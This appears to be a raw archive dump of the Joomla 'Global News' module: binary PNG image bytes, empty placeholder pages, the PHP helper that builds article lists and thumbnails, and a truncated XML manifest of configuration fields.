��@��@nm�*��Ɣ�3*����)�)� ����rK��&mdS�M�KE �rҖ�NG�B�,i��'e��᭱�dP�T*�?rD���B@7r����@"O>����w�� t(����D�D���ݽ�3��u��kC�P�h~ �H�p9 �$Y���Fo<�˙�50)�9��2I�E�E ˑgG��ؕ�]TK���TI��]�P����9��c�����i�.��0�����N�~��&����0��en4������ �V�9�#˲a~�W�!(]@<�&� ��5����LT�D�]FB� 'b�"��E�����$�2�$7#b�xx5�Ԣ�����%Y,��g��Pg�Q��e8��3�>��ڷ��b}`�N6���7���|���E��v @�$|���@P��O�+a�_JPuW����y,=1���$B#�b d���4�Q�x���M7���j��� ��Ps@]�@D�p�S��� H�AÕ5�,��}�:د����]g��W������v��|��$BM��_��䍢B���g��F9 @�r.1����z1=��m����X�csB@.��20d�<�D%E�d�h}@ �&��8 b��j��F !�șD����e�`$A�o�57 `C0u5��X��S�|>�eE% �v��:��F{zz� � "�ſ����h[���Iq�r��Lj��zXbr���C��L��o�v����[ܒmϢ�m�T��펻�g�=��w���4����e @B�CV5$w���5NO��9�>� G� �q��_]0)����,u��k.C�(تA���+��_~]�־�������j];�j�sw�OW^~5��������r! �����O�[w6���;+���g���ʄ�*�Nt���F�}�97:�Poۺ5��H�N�u��s!���,������<i��]�#���߁�Ԅg�i~��� }�E�5��"ڍ�.ц�3e2Hm۾Ӱ��O�>���[��z@F�Ԩc�m��%���ɫ��-�nKM�5�" �����������e��V�={��-/���������v��#��?$� UQY +�BL��2� �v ���������@27:�Y�05�F��bY���>���~c=i��/�N�H^�劏�f���g����X,6<<LN{�ȕ�nHe.J#]�2qi~�e��UԢ}���)���`ɺ��L��|x_L㭝��;W���_}}��%�P�l���;�G����ЁΟ�)c���ZM뷞�+����-{||"�~���{����� ��8�>���{��&�~��h���o��B ���g��/]Uu`���\���n� Cu�k ���?�۸�R���>�G��k�WǯWg���5��zt_oDI�����sXv�sF�{魡��/�?Dž�#\����x}mk��7%�P(!�[����W�J#�v]�駟I�Z������_ˇ&�u�����d䦆n���w[[�0������컃K��ˊe~��ޓ��WK�8�����L�Shگܱ�}u~]�H�ul������/�2Z���Z�Z�k^����Y�>+ F�v�Ļ�V) גLNLL��p8���&�ť%��q7���/���K��<H�����6JQ� ���������s⡇�H��0g�qP�F�=#[rC������8G��н�b�əT�9���UA<wdb�3�X�VjkI�p�t8b�¶�-���B��]������`kkk4�B� ��$����/�����y�J\�4z,���\���R���r~6��o��a� ��� (��.OM�c3�Ә;T(y�B$��Ȳ�d�1��۹�r�b��[ 9ZȈ�[����##�^mYV2K�z���-)�w����W�P&�*��c�c�v��8�+\�]��yEI�����Ȱ��=d'�{�}�d���>�����8�s'��F���Z���W���+���-�B��ُ�z�'�Ւ�y�-��֓YGV0�~�Z���P�,�t_�~�����$��L�[٨| ��n�B~p�1��w�Έ����9V�,V��m��e"-!s�����wN^�L%��F<+ʶr�-ٷT]��"���1��/9A_)���q�;;:���\`0Ƽ��/�!�������˗��~"�q��e�}-�+���D�Sձ�+;���V�Q�B$���(�bu�Su���L�����~$��k����3����Ij��ξ���9Zs���07������of�+JKh��l�{���v��2�135�}��r��S���o�ο �EQ�%@��$�y睪��uם������xL��x���g�;pnn�cG��Ae2�H\�`���Ж��֮��.�ڽJ��řh����%i-�]i�*o,gT=��ԪW˼�#�@��-A�鬲j8ݢ��u��e��h͐���QY��N��R��R���?��<��)�YY_Y4B?|{}l�w�y�C<0}�0��@�u\��*܉'���ڵq�X6��6>�g��~�����ƪ�n�Fr=�plGU5�&TU�&��M��b$^��B�h��7{�����^[�L�Mv �o��,Ե�ȕ0�:��vۣz<�*�S*��h�P5��kr�6����qf}���?&�S��mCW/_x�o��������� ���}�/��ͻ�:�e��.ccU�l6#IR"�dY��dRմ÷Rezz�C�����a�B�r)��C�� K~JC�"\+gח��5�ulE-F��[Ώ@d�����H��kie� 8������%�}���*��z�-Ť�� �����To�e?���3���g~��0>yat���:���`.���3S=}9������Ȉ�(�\NQ�h4z�����!��?w����6)�I(���.1I���Յ�f[1kYI�Mwp&a�2"@�M��]6"�p�7��Ǧ(���#�����~ssx�O��|�eDj�-,;�-���O�fn�4�/���b&���чg�t.����[%E��>y�]]!��j���8�|�@x���s����ر}f�z{{����;.��G�66�^�ML�����]�������ѫ���5��O/wN��c+�\�g���Q�F�N$xw� ����˃G7rc���œ��x�>I��V��skb]��D�+���]�����_;yyv�b�X����Ν�O��`~v�\f��? b�P�W�01��G,-9�H�$[�~�:<2����[��t$1�+��r��� �:�뺄7����|��[���3}}�|麲s�7��*����Ьz��ǝ��d�ElQ܈�b�����j/�+�#�lC�����s���IDATY�ue씫E�õ�LWb"S���L|�l�wG�;����w�Y+���ŋ����������Q_����ɏ�o<�HE����몢!VVV4M[[[�4-�(�R�DD8췸�Ύf��.�ٙQ�O��62�e;6'7y�ru*���4 ��ՒhK-�^8r�1�U$WG����5�$;�m��\#�w�b6��{�����a25��=�ІӢK�3y�?����xF�eۤ��ݖ��d��f�ߑ��(���P��c� `�QUUM�eY�e9��D�U��� 2�f�A�{��D"��?>pg ε���g��u��9g��w��D{{{]�ȁ��8Lr8���i��m���xWmUzdQho��.u���.G�p�폆BmS��z��݉�@d��J�v�|nǐ�w{f�A�t��?�v?�J���W��C�vdE��iJL��2����uEU�6Њ �Z�Q&q���d�����Q���%8O�H�P+k9�d��ѣ����t���i��"�ބԓ��Ċ��� ە)��}�qV�g�;{���ݽUD�k�ɮ����1�9�v�9�Oϕ�N�V�~|u|y����V/콿czB�P��zGU�5D�d ��@��{�ҥ`�� 0�n5<��u��7���w� m��J �C���B�XZ�.~2��{w�<x�`0�W*.��@�.��M�:Yeӎ� ��>�F��І�I���c�v�3>�!+�29���U��T��jM�K��4�����M��:{轗ha�Б��� H�#lX4�J_�v-�z.d�P/4�4"ڱcG.�{���Fn=oG�K��"�$�֥����Dyi�ꅅf���'�|��O���wG0�L�ds�t S���nQF�j�%$Y�VHG���B��6 MGH���U)�K�6�a N9�_��ݫ(�L��K��{o��]邇Q�Z͜���y��z�>�ͤ�گs�ޑJ����/��Ν}�xk��ŌHTbhU��i�j�UƤ\nǶ�;���d2Y�w�B.w8."SdT���VG�q�!Pm� AZ�HrMU���R��h�%e��Z��A���x,�98�J+�]Z��T_����[�<rP�4��BQ�jR��i��n������y/y;;;��:�ȶ�Z� �����ܐX�=�Z�Qh#a�J���HB� U�d9,�$�F6�-��,4�D-�u[��k��Y(� �S{Ƈ���:!UW%9���d��H�2���^���g�DU���P�g�VR'�)x�o�W����؍���wh(�$I�Ν۹s�ox�h�vͲwDu�D D��qd 6C�W�dG hUIp�@������`�2n1!Hэ��FQ��� ��/� �zzvs�q���X_Z��旂�i�5�a� 痋����$�ΪQ�"����� lM��k�1�s�� �ї�v^�A��`M�����_ހ��|s���W���D����6��l���� ���y���)k�������7 �$5f���4<Y�$s0 �O��\,lH�9� -��L�^�f����/S���ﭺ�&���uj6���e��[_?�s^?��R�T*o�Mmf �X[]�:b!T�U�u1`�q۶��R�w��O�j��7�J���ש}Z9w!P�Z������4�W�Q�oG��z�կ�6�,`�]�vM�$Ƥp8���������m۶s��\.���������u#�HWW���TOOw�XTEUե��r��Lzo�c�Z �ÕJ%�J�d296v��*���p��B!�j���Dt��Xoo��(����TJ�$!�\.���J.�j�f2��T*�euww+�8�@����p�Ј�}Y�` B�$a�R�mK�eEQj�Z</�B�|>�GGGY.��$�P(.,,ttt�j����v���t]WU�s~� �;w��� !�Z�2���罔`nn^Qd������末�299���W�������T*�F���eι���j��*���듓��Ba``�s.�2b�M�-�x��3���]MU��� �éa��]��/tuu2�� !,˪�j�L�4M�0������8�Dm��.UU��M�|�e�Kϣ�TU�Vk��zg��.��)�e-��B���-aY�$I~���8�J5�N����JPϼ��J �/�:��IEND�B`�thumbs/index.html000060400000000035151652221530010037 0ustar00<html> <body> </body> </html>thumbs/00/index.html000060400000000035151652221530010256 0ustar00<html> <body> </body> </html>helper.php000060400000052324151652221530006540 0ustar00<?php /*------------------------------------------------------------------------ # mod_globalnews - Global News Module # ------------------------------------------------------------------------ # author Joomla!Vargas # copyright Copyright (C) 2010 joomla.vargas.co.cr. All Rights Reserved. # @license - http://www.gnu.org/licenses/gpl-2.0.html GNU/GPL # Websites: http://joomla.vargas.co.cr # Technical Support: Forum - http://joomla.vargas.co.cr/forum -------------------------------------------------------------------------*/ // no direct access defined('_JEXEC') or die; require_once (JPATH_SITE.'/components/com_content/helpers/route.php'); jimport('joomla.application.component.model'); JModelLegacy::addIncludePath(JPATH_SITE.'/components/com_content/models', 'ContentModel'); abstract class modGlobalNewsHelper { public static function getGN_Img( &$params, $link, $img, $pfx ) { $align = $params->get( $pfx.'_img_align', 'left' ); $margin = $params->get( $pfx.'_img_margin', '3px' ); $width = (int)$params->get( $pfx.'_img_width', '' ); $height = (int)$params->get( $pfx.'_img_height', '' ); $border = $params->get( $pfx.'_img_border', '0' ); if ( $align == 'left' ) : $style = 'float:left;'; if ( $pfx == 'cat' ) { $style .= 'margin-right:' . $margin . ';'; } else { $style .= 'margin:' . $margin . ';'; } endif; if ( $align == 'right' ) : $style = 'float:right;'; if ( $pfx == 'cat' ) { $style .= 'margin-left:' . $margin . ';'; } else { $style .= 'margin:' . $margin . ';'; } endif; $style .= 'border:' . $border . ';'; $attribs = array ('style' => $style); if (!$params->get('thumb_image', 1)) { if ( $height ) $attribs = array('height' => $height, $attribs); if ( $width ) $attribs = array('width' => $width, $attribs ); } $image = JHTML::_('image', $img, JText::_('IMAGE'), $attribs ); if ( $link ) $image = JHTML::_('link', $link, $image); if ( $align == 'center') $image = '<center>' . $image . '</center>'; return $image; } public static function getGN_Cats(&$params) { $db = JFactory::getDBO(); $user = JFactory::getUser(); $groups = implode(',', $user->getAuthorisedViewLevels()); $catid = $params->get('catid', ''); $curcat = $params->get('curcat', 0); $current = $params->get('current', 1); $show_cat = $params->get('show_cat', 1); $cat_title = $params->get('cat_title', 1); $cat_img = $params->get( 'cat_img_align', 0); $access = !JComponentHelper::getParams('com_content')->get('show_noauth'); $group_id = $condition = ''; switch ($params->get( 'cat_order', 1)) { case '0': $ordering = 'rand()'; break; case '1': $ordering = 'c.id ASC'; break; case '2': $ordering = 'c.title ASC'; break; case '3': default: $ordering = 'c.lft ASC'; break; } if ( $curcat == 0 || $current != 1 ) : if ( JRequest::getCmd('option') == 'com_content' ) { $view = JRequest::getCmd('view'); $temp = JRequest::getString('id'); $temp = explode(':', $temp); $id = $temp[0]; } endif; $catids = $params->get('catid'); JArrayHelper::toInteger($catids); $catids = implode(',', $catids); if (!empty($catids)) { $condition .= ' AND c.id IN ('.$catids.')'; } $query = 'SELECT c.*, ' . ' CASE WHEN CHAR_LENGTH(c.alias) THEN CONCAT_WS(":", c.id, c.alias) ELSE c.id END as slug' . ' FROM #__categories AS c' . ' WHERE c.published = 1 AND c.extension = "com_content"' . ($access ? ' AND c.access IN ('.$groups.')' : ''). ($condition!='' ? $condition : ''). ' ORDER BY '. $ordering; $db->setQuery($query); $cats = $db->loadObjectList(); foreach ( $cats as &$cat ) { $cat->link = JRoute::_(ContentHelperRoute::getCategoryRoute( $cat->slug )); $cat->cond = $cat->id; $cat->image = ''; if ( $cat_img ) { $catParams = new JRegistry; $catParams->loadString($cat->params); if ( $image = $catParams->get('image')) { $cat->image .= modGlobalNewsHelper::getGN_Img( $params, $cat->link, $image, 'cat' ); } } if ( $group_id == $cat->id && $curcat == 0 ) { $cat->link = ''; } if ( $cat_title != 0 ) { $tags = array(array('',''),array('',''),array('<strong>','</strong>'),array('<u>','</u>'),array('<strong><u>','</u></strong>'),array('<h1>','</h1>'),array('<h2>','</h2>'),array('<h3>','</h3>'),array('<h4>','</h4>'),array('<h5>','</h5>'),array('<h6>','</h6>')); if ( $show_cat == 2 ) { $cat->title = $tags[$cat_title][0] . $cat->title . $tags[$cat_title][1]; } else { $cat->title = ( $cat_title > 4 ? $tags[$cat_title][0] : '' ) . ( $cat->link ? '<a href="' . $cat->link. '">' : '' ) . ( $cat_title < 5 ? $tags[$cat_title][0] : '' ) . $cat->title . ( $cat_title < 5 ? $tags[$cat_title][1] : '' ) . ( $cat->link ? '</a>' : '' ) . ( $cat_title > 4 ? $tags[$cat_title][1] : '' ); } } else { $cat->title = ''; } } return $cats; } public static function getGN_List(&$params,$catid) { $db = JFactory::getDBO(); $user = JFactory::getUser(); $userId = (int) $user->get('id'); $groups = implode(',', $user->getAuthorisedViewLevels()); $count = trim( $params->get('count', 5) ); $current = trim( $params->get('current', 1) ); $layout = $params->get('layout', 'list'); $html = $params->get('html'); $show_front = $params->get('show_front', 1); $aid = $user->get('aid', 0); $limittitle = $params->get('limittitle', ''); $nullDate = $db->getNullDate(); jimport('joomla.utilities.date'); $date = new JDate(); $now = $date->toSql(); $article_id = 0; if ($current != 1 && JRequest::getCmd('option') === 'com_content' && JRequest::getCmd('view') === 'article') { $article_id = JRequest::getInt('id'); } $articles = JModelLegacy::getInstance('Articles', 'ContentModel', array('ignore_request' => true)); $app = JFactory::getApplication(); $appParams = $app->getParams(); $articles->setState('params', $appParams); $articles->setState('list.start', 0); $articles->setState('list.limit', (int) $params->get('count', 5)); $articles->setState('filter.published', 1); $access = !JComponentHelper::getParams('com_content')->get('show_noauth'); $authorised = JAccess::getAuthorisedViewLevels(JFactory::getUser()->get('id')); $articles->setState('filter.access', $access); if ($params->get('show_child_category_articles', 0) && (int) $params->get('levels', 0) > 0) { $categories = JModelLegacy::getInstance('Categories', 'ContentModel', array('ignore_request' => true)); $categories->setState('params', $appParams); $levels = $params->get('levels', 1) ? $params->get('levels', 1) : 9999; $categories->setState('filter.get_children', $levels); $categories->setState('filter.published', 1); $categories->setState('filter.access', $access); $additional_catids = array(); $categories->setState('filter.parentId', $catid); $recursive = true; $items = $categories->getItems($recursive); if ($items) { foreach($items as $category) { $condition = (($category->level - $categories->getParent()->level) <= $levels); if ($condition) { $additional_catids[] = $category->id; } } } $catid = array_unique(array_merge(array($catid), $additional_catids)); } $articles->setState('filter.category_id', $catid); $articles->setState('list.ordering', $params->get('article_ordering', 'a.ordering')); if ($params->get('article_ordering') != 'rand()') { $articles->setState('list.direction', $params->get('article_ordering_direction', 'ASC')); } else { $articles->setState('list.direction', ''); } $articles->setState('filter.featured', $params->get('show_front', 'show')); $articles->setState('filter.author_id', $params->get('created_by', "")); $articles->setState('filter.author_id.include', 1); if ( $article_id && $current == 0 ) { $articles->setState('filter.article_id', $article_id); $articles->setState('filter.article_id.include', false); // Exclude } $articles->setState('filter.language',$app->getLanguageFilter()); $rows = $articles->getItems(); foreach ( $rows as &$row ) { if ( $article_id == $row->id && $current == 2 ) { $link = ''; } else { $row->slug = $row->id.':'.$row->alias; $row->catslug = $row->catid ? $row->catid .':'.$row->category_alias : $row->catid; $link = JRoute::_(ContentHelperRoute::getArticleRoute($row->slug, $row->catslug)); } if ( $limittitle && strlen( $row->title ) > $limittitle ) { $row->title = substr( $row->title, 0, $limittitle ). '...'; } if ( $link ) { $row->title = '<a href="'.$link.'">'.htmlspecialchars( $row->title ).'</a>'; } else { $row->title = htmlspecialchars( $row->title ); } if ( $layout != 'list' ) : $gn_image = ''; $gn_title = ''; $gn_created = ''; $gn_author = ''; $gn_text = ''; $gn_readmore = ''; $gn_comments = ''; if ( preg_match("/GN_title/", $html) ) { $gn_title = $row->title; $gn_title = preg_replace('/\$/','$-',$gn_title); } if ( preg_match("/GN_date/", $html) ) { $gn_created = JHTML::_('date', ($params->get( 'date' ) == 'created' ? $row->created : $row->modified ), $params->get('date_format', '' ) ); } if ( preg_match("/GN_author/", $html) ) { $author = $params->get( 'author' ); if ( $author != 'alias' ) { $query = "SELECT " . $author . " FROM #__users WHERE id = " . $row->created_by; $db->setQuery($query); $gn_author = $db->loadResult(); } else { $gn_author = $row->created_by_alias; } } if ( preg_match("/GN_image/", $html) ) { $img = ''; $images = json_decode($row->images); if (isset($images->image_intro) and !empty($images->image_intro)) : $img = $images->image_intro; elseif (isset($images->image_fulltext) and !empty($images->image_fulltext)) : $img = $images->image_fulltext; else : $regex = "/<img[^>]+src\s*=\s*[\"']\/?([^\"']+)[\"'][^>]*\>/"; $search = $row->introtext; preg_match ($regex, $search, $matches); $images = (count($matches)) ? $matches : array(); if ( count($images) ) { $img = $images[1]; } endif; if ($img) { if ($params->get('thumb_image', 1)) { $img = str_replace(JURI::base(false),'',$img); $img = modGlobalNewsHelper::getThumbnail($img,$params,$row->id); } $gn_image = modGlobalNewsHelper::getGN_Img ( $params, $link, $img, 'item' ); } } if ( preg_match("/GN_text/", $html) ) { $limit = trim( $params->get('limittext', '150') ); $gn_text = $row->introtext; if ( $params->get('striptext', '1')) $gn_text = trim( strip_tags( $gn_text, $params->get('allowedtags', '') ) ); $pattern = array("/[\n\t\r]+/",'/{(\w+)[^}]*}.*{\/\1}|{(\w+)[^}]*}/Us', '/\$/'); $replace = array(' ', '', '$-'); $gn_text = preg_replace( $pattern, $replace, $gn_text ); if ( $limit && strlen( $gn_text ) > $limit ) { $gn_text = substr( $gn_text, 0, $limit ); $space = strrpos( $gn_text, ' ' ); $gn_text = substr( $gn_text, 0, $space ). '...'; } } if ( preg_match("/GN_readmore/", $html) && $link ) { $gn_readmore = JHTML::_('link', $link, JText::_('MOD_GLOBALNEWS_READ_MORE_TITLE')); } $code = array("/GN_image/", "/GN_title/", "/GN_date/", "/GN_author/", "/GN_text/", "/GN_readmore/", "/GN_comments/","/GN_break/","/GN_space/","/GN_hits_label/","/GN_hits_value/"); $rplc = array( $gn_image, $gn_title, $gn_created, $gn_author, $gn_text, $gn_readmore, $gn_comments, "<br />", " ", JText::_('MOD_GLOBALNEWS_HITS_LABEL'), $row->hits); $row->content = preg_replace($code, $rplc, $html); $row->content = preg_replace('/\$-/','$',$row->content); endif; } return $rows; } public static function addGN_CSS(&$params, $layout, $globalnews_id, $total) { $doc = JFactory::getDocument(); $layout = $params->get( 'layout', 'list' ); $padding = (int)$params->get('padding', '5px'); $border = $params->get('border', '1px solid #EFEFEF'); $color = $params->get('color', '#FFFFFF'); $show_cat = $params->get('show_cat', '1'); $css = ''; if ( $globalnews_id == 1 ) : $css .= ".gn_clear { clear:both; height:0; line-height:0; }\n"; endif; $header = '.gn_header_' . $globalnews_id . ' {' .' background-color:' . $params->get('header_color', '#EFEFEF') . ';' .' border:' . $border . ';' .' border-bottom:none;' .' padding:' . (int)$params->get('header_padding', '5px') . 'px;' .' }'; $marquee = ' border:' . $border . ';' . ( $show_cat != 0 ? ' border-top:none;' : '' ) .' padding:' . $padding . 'px;' .' height:' . $params->get('height', '100px') . ';' .' background-color:' . $color . ';' .' overflow:hidden;'; switch ( $layout ) { case 'list' : $css .= $header . "\n" .".gn_list_" . $globalnews_id . " {" . $marquee ." }"; break; case 'static' : $css .= $header . "\n" .".gn_static_" . $globalnews_id . " {" . $marquee ." }"; break; case 'slider' : $css .= $header . "\n" .".gn_slider_" . $globalnews_id . " {" . $marquee ." border-bottom:none;" ." }" . "\n" .".gn_slider_" . $globalnews_id . " .gn_opacitylayer {" ." height:100%;" ." filter:progid:DXImageTransform.Microsoft.alpha(opacity=100);" ." -moz-opacity:1;" ." opacity:1;" ." }" . "\n" .".gn_pagination_" . $globalnews_id . " {" ." border:" . $border . ";" ." border-top:none;" ." padding:2px " . $padding . "px;" ." text-align:right;" ." background-color:" . $color . ";" ." }" . "\n" .".gn_pagination_" . $globalnews_id . " a:link {" ." font-weight:bold;" ." padding:0 2px;" ." }" . "\n" .".gn_pagination_" . $globalnews_id . " a:hover, .gn_pagination_" . $globalnews_id . " a.selected {" ." color:#000;" ." }"; break; case 'browser' : $containerIds = array(); for ($m=0;$m<$total;$m++) { $containerIds[$m] = '#gn_container_' . $globalnews_id . '_' . ($m+1); } $css .= $header . "\n" . implode(',' , $containerIds) . " {" . $marquee ." position: relative;" ." }"; break; case 'scroller' : $scrollerIds = array(); for ($m=0;$m<$total;$m++) { $scrollerIds[$m] = '#gn_scroller_' . $globalnews_id . '_' . ($m+1); } $css .= $header . "\n" . implode(',' , $scrollerIds) . " {" . $marquee ." }"; break; } return $doc->addStyleDeclaration($css); } public static function getThumbnail($img,&$params,$item_id) { $width = $params->get('thumb_width',90); $height = $params->get('thumb_height',90); $proportion = $params->get('thumb_proportions','bestfit'); $img_type = $params->get('thumb_type',''); $bgcolor = hexdec($params->get('thumb_bg','#FFFFFF')); $img_name = pathinfo($img, PATHINFO_FILENAME); $img_ext = pathinfo($img, PATHINFO_EXTENSION); $img_path = JPATH_BASE . '/' . $img; $size = @getimagesize($img_path); $errors = array(); if(!$size) { $errors[] = 'There was a problem loading image ' . $img_name . '.' . $img_ext; } else { $sub_folder = '0' . substr($item_id, -1); if ( $img_type ) { $img_ext = $img_type; } $origw = $size[0]; $origh = $size[1]; if( ($origw<$width && $origh<$height)) { $width = $origw; $height = $origh; } $prefix = substr($proportion,0,1) . "_".$width."_".$height."_".$bgcolor."_".$item_id."_"; $thumb_file = $prefix . str_replace(array( JPATH_ROOT, ':', '/', '\\', '?', '&', '%20', ' '), '_' ,$img_name . '.' . $img_ext); //$thumb_path = __DIR__ . '/thumbs/' . $sub_folder . '/' . $thumb_file; $thumb_path = dirname(__FILE__) . '/thumbs/' . $sub_folder . '/' . $thumb_file; $attribs = array(); if(!file_exists($thumb_path)) { modGlobalNewsHelper::calculateSize($origw, $origh, $width, $height, $proportion, $newwidth, $newheight, $dst_x, $dst_y, $src_x, $src_y, $src_w, $src_h); switch(strtolower($size['mime'])) { case 'image/png': $imagecreatefrom = "imagecreatefrompng"; break; case 'image/gif': $imagecreatefrom = "imagecreatefromgif"; break; case 'image/jpeg': $imagecreatefrom = "imagecreatefromjpeg"; break; default: $errors[] = "Unsupported image type $img_name.$img_ext ".$size['mime']; } if ( !function_exists ( $imagecreatefrom ) ) { $errors[] = "Failed to process $img_name.$img_ext. Function $imagecreatefrom doesn't exist."; } $src_img = $imagecreatefrom($img_path); if (!$src_img) { $errors[] = "There was a problem to process image $img_name.$img_ext ".$size['mime']; } $dst_img = ImageCreateTrueColor($width, $height); // $bgcolor = imagecolorallocatealpha($image, 200, 200, 200, 127); imagefill( $dst_img, 0,0, $bgcolor); if ( $proportion == 'transparent' ) { imagecolortransparent($dst_img, $bgcolor); } imagecopyresampled($dst_img,$src_img, $dst_x, $dst_y, $src_x, $src_y, $newwidth, $newheight, $src_w, $src_h); switch(strtolower($img_ext)) { case 'png': $imagefunction = "imagepng"; break; case 'gif': $imagefunction = "imagegif"; break; default: $imagefunction = "imagejpeg"; } if($imagefunction=='imagejpeg') { $result = @$imagefunction($dst_img, $thumb_path, 80 ); } else { $result = @$imagefunction($dst_img, $thumb_path); } imagedestroy($src_img); if(!$result) { if(!$disablepermissionwarning) { //$errors[] = 'Could not create image:<br />' . $thumb_path . '.<br /> Check if the folder exists and if you have write permissions:<br /> ' . __DIR__ . '/thumbs/' . $sub_folder; $errors[] = 'Could not create image:<br />' . $thumb_path . '.<br /> Check if the folder exists and if you have write permissions:<br /> ' . dirname(__FILE__) . '/thumbs/' . $sub_folder; } $disablepermissionwarning = true; } else { imagedestroy($dst_img); } } } if (count($errors)) { JError::raiseWarning(404, implode("\n", $errors)); return false; } $image = JURI::base(false)."modules/mod_globalnews/thumbs/$sub_folder/" . basename($thumb_path); return $image; } public static function calculateSize($origw, $origh, &$width, &$height, &$proportion, &$newwidth, &$newheight, &$dst_x, &$dst_y, &$src_x, &$src_y, &$src_w, &$src_h) { if(!$width ) { $width = $origw; } if(!$height ) { $height = $origh; } if ( $height > $origh ) { $newheight = $origh; $height = $origh; } else { $newheight = $height; } if ( $width > $origw ) { $newwidth = $origw; $width = $origw; } else { $newwidth = $width; } $dst_x = $dst_y = $src_x = $src_y = 0; switch($proportion) { case 'fill': case 'transparent': $xscale=$origw/$width; $yscale=$origh/$height; if ($yscale<$xscale){ $newheight = round($origh/$origw*$width); $dst_y = round(($height - $newheight)/2); } else { $newwidth = round($origw/$origh*$height); $dst_x = round(($width - $newwidth)/2); } $src_w = $origw; $src_h = $origh; break; case 'crop': $ratio_orig = $origw/$origh; $ratio = $width/$height; if ( $ratio > $ratio_orig) { $newheight = round($width/$ratio_orig); $newwidth = $width; } else { $newwidth = round($height*$ratio_orig); $newheight = $height; } $src_x = ($newwidth-$width)/2; $src_y = ($newheight-$height)/2; $src_w = $origw; $src_h = $origh; break; case 'only_cut': // } $src_x = round(($origw-$newwidth)/2); $src_y = round(($origh-$newheight)/2); $src_w = $newwidth; $src_h = $newheight; break; case 'bestfit': $xscale=$origw/$width; $yscale=$origh/$height; if ($yscale<$xscale){ $newheight = $height = round($width / ($origw / $origh)); } else { $newwidth = $width = round($height * ($origw / $origh)); } $src_w = $origw; $src_h = $origh; break; } } }mod_globalnews.xml000060400000032215151652221530010263 0ustar00<?xml version="1.0" encoding="utf-8"?> <extension type="module" version="3.0" client="site" method="upgrade" > type="module" version="1.7" client="site" method="upgrade"> <name>Global News</name> <author>Jesus Vargas</author> <creationDate>April 2008</creationDate> <copyright>(C) 2005 - 2007 Open Source Matters. All rights reserved.</copyright> <license>http://www.gnu.org/licenses/gpl-2.0.html GNU/GPL</license> <authorEmail>chuzky@gmail.com</authorEmail> <authorUrl>http://www.joomlahill.com</authorUrl> <version>2.5.2</version> <description>Groups your news by sections or by categories</description> <files> <filename module="mod_globalnews">mod_globalnews.php</filename> <filename>helper.php</filename> <filename>index.html</filename> <folder>scripts</folder> <folder>thumbs</folder> <folder>tmpl</folder> </files> <languages> <language tag="en-GB">language/en-GB/en-GB.mod_globalnews.ini</language> <language tag="en-GB">language/en-GB/en-GB.mod_globalnews.sys.ini</language> </languages> <config> <fields name="params"> <fieldset name="basic"> <field name="layout" type="list" default="0" label="Article List Layout" description="Choose an Article List Layout"> <option value="list">Plain List</option> <option value="static">Static Content</option> <option value="slider">Content Slider</option> <option value="browser">Content Browser</option> <option value="scroller">Content Scroller</option> </field> <field name="cols" type="text" default="1" label="Columns" description="Number of columns" /> <field name="margin" type="text" default="2px" label="Margin" description="Margin between Groups" /> <field name="catid" type="category" extension="com_content" multiple="true" size="5" label="Categories" description="Please select one or more categories"> <option value="">All</option> </field> <field name="show_child_category_articles" type="radio" class="btn-group" default="0" label="Child Category Articles" description="Include or Exclude Articles from Child Categories"> <option value="1">Include</option> <option value="0">Exclude</option> </field> <field name="levels" type="text" default="1" label="Category Depth" description="The number of child category levels to return" /> <field name="cat_order" type="list" default="1" label="Category Order" description="Categories/Sections ordering options"> <option value="1">By ID</option> <option value="2">By Title</option> <option value="3">By Default</option> <option value="0">Random</option> </field> <field name="empty" type="radio" class="btn-group" default="0" label="Empty Category" description="Hide/Show empty Category/Section"> <option value="1">Show</option> <option value="0">Hide</option> </field> <field name="curcat" type="radio" class="btn-group" default="0" label="Current Category" description="If you are viewing a particular Category/Section"> <option value="1">Clickable</option> <option value="0">Non Clickable</option> </field> <field name="show_cat" type="list" default="1" label="Category Header" description="Show/Hide Category/Section name"> <option value="0">Hide</option> <option value="1">Show Clickable</option> <option value="2">Show Non Clickable</option> </field> <field name="cat_title" type="list" default="1" label="Category Title" description="Category/Section Title"> <option value="0">Hide</option> <option value="1">Normal</option> <option value="2">Strong</option> <option value="3">Underline</option> <option value="4">Strong Underline</option> <option value="5">Heading 1</option> <option value="6">Heading 2</option> <option value="7">Heading 3</option> <option value="8">Heading 4</option> <option value="9">Heading 5</option> <option value="10">Heading 6</option> </field> <field name="cat_img_align" type="list" default="0" label="Category Image" description="Categories/Sections Images"> <option value="0">Hide</option> <option value="left">Float Left</option> <option value="right">Float Right</option> <option value="center">Center</option> </field> <field name="cat_img_width" type="text" default="" label="Category Image Width" description="Category Image Width (px), or leave blank for a proportional width" /> <field name="cat_img_height" type="text" default="" label="Category Image Height" description="Category Image Height (px), or leave blank for a proportional height" /> <field name="cat_img_margin" type="text" default="3px" label="Category Image Margin" description="Category Image Margin" /> <field name="cat_img_border" type="text" default="0" label="Category Image Border" description="Category Image Border" /> <field name="filteringspacer1" type="spacer" hr="true" /> <field name="count" type="text" default="5" label="Count Articles" description="The number of items to display for each Section/Category (default 5)" /> <field name="article_ordering" type="list" default="a.title" label="Article Field to Order By" description="Select which field you would like Articles to be ordered by. Featured Ordering should only be used when Ordering Option for Featured Articles is set to 'Only'"> <option value="a.ordering">Ordering</option> <option value="fp.ordering">Featured Ordering</option> <option value="a.hits">Hits</option> <option value="a.title">Title</option> <option value="a.id">Id</option> <option value="a.alias">Alias</option> <option value="a.created">Created Date</option> <option value="modified">Modified Date</option> <option value="publish_up">Start Publishing Date</option> <option value="a.publish_down">Finish Publishing Date</option> <option value="rand()">Random</option> </field> <field name="article_ordering_direction" type="list" default="ASC" label="Ordering Direction" description="Select the direction you would like Articles to be ordered by"> <option value="DESC">Descending</option> <option value="ASC">Ascending</option> </field> <field name="limittitle" type="text" default="" label="Title Chars Limit" description="Article's Title Characters Limit" /> <field name="show_front" type="list" default="0" label="Featuread Items" description="Show/Hide Featured Articles"> <option value="show">Show</option> <option value="hide">Hide</option> </field> <field name="created_by" type="sql" multiple="true" size="5" label="Authors" description="Select one or more authors from the list below" query="select id, name, username from #__users where id IN (select distinct(created_by) from #__content) order by name ASC" key_field="id" value_field="name" > <option value="">Select Authors</option> </field> <field name="current" type="list" default="1" label="Current Article in List" description="If you are looking at an article that happens to be on the list"> <option value="0">Hide</option> <option value="1">Show Clickable</option> <option value="2">Show non Clickable</option> </field> <field name="more" type="radio" class="btn-group" default="0" label="MORE ARTICLES link" description="Show/Hide MORE ARTICLES link"> <option value="1">Show</option> <option value="0">Hide</option> </field> <field name="filteringspacer2" type="spacer" hr="true" /> <field name="width" type="text" default="auto" label="Width" description="If not auto, specify px, em or %" /> <field 